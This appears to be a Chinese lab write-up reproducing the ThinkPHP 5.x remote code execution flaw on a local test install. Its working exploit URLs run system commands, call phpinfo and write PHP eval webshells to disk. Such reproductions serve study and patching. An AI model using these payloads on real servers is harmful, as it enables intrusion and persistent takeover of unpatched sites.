ThinkPHP 5.x远程命令执行漏洞复现

漏洞描述

2018年12月10日，ThinkPHP官方发布了安全更新，其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075

漏洞的原因是由于框架对控制器名没有进行足够的检测，导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行，受影响的版本包括5.0和5.1。

漏洞影响版本

Thinkphp 5.x-Thinkphp 5.1.31

Thinkphp 5.0.x<=5.0.23

复现环境

thinkphp5.0.22 phpstudy集成环境（php5.5.38+apache+mysql)

漏洞复现

1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html

2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问
http://127.0.0.1/thinkphp_5.0.22/public

3、利用system函数远程命令执行，Payload:

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

4、通过phpinfo函数查看phpinfo()的信息，Payload:

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5、写入shell，Payload:

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

6、查看成功写入shell

7、另一种写入shell Payload：

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>